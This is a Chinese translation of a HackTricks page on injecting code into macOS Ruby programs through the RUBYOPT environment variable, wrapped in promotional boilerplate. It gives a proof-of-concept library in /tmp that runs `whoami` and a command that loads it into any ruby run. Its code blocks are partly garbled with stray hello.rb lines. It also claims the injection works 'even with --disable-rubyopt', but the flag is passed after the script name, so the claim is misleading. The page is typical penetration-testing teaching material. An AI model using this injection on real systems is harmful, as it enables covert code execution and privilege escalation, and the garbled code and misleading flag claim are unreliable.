hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

macOS Ruby 应用程序注入

从零开始学习 AWS 黑客攻击直到成为专家，通过 htARTE (HackTricks AWS 红队专家)！

其他支持 HackTricks 的方式：

• 如果你想在 HackTricks 中看到你的公司广告或下载 HackTricks 的 PDF，请查看订阅计划！
• 获取 官方 PEASS & HackTricks 商品
• 发现 PEASS 家族，我们独家的 NFTs 集合
• 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享你的黑客技巧。

RUBYOPT

使用这个环境变量可以在每次执行 ruby 时添加新的参数。虽然不能使用参数 -e 来指定要执行的 ruby 代码，但可以使用参数 -I 和 -r 来添加一个新的文件夹到库加载路径，然后指定一个要加载的库。

在 /tmp 中创建库 inject.rb：

{% code title="inject.rb" %}

puts `whoami`

# hello.rb 内容
puts "Hello, world!"

{% endcode %}

创建一个 Ruby 脚本，例如：

{% code title="hello.rb" %}

puts "Hello, world!"

{% endcode %}

puts 'Hello, World!'

然后使用以下命令加载一个任意的ruby脚本：

RUBYOPT="-I/tmp -rinject" ruby hello.rb

趣事，即使使用参数 --disable-rubyopt 也能工作：

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS红队专家)！

支持HackTricks的其他方式：

• 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
• 获取官方PEASS & HackTricks商品
• 发现PEASS家族，我们独家的NFTs系列
• 加入 💬 Discord群组 或 telegram群组 或在Twitter 🐦 上关注我 @carlospolopm。
• 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。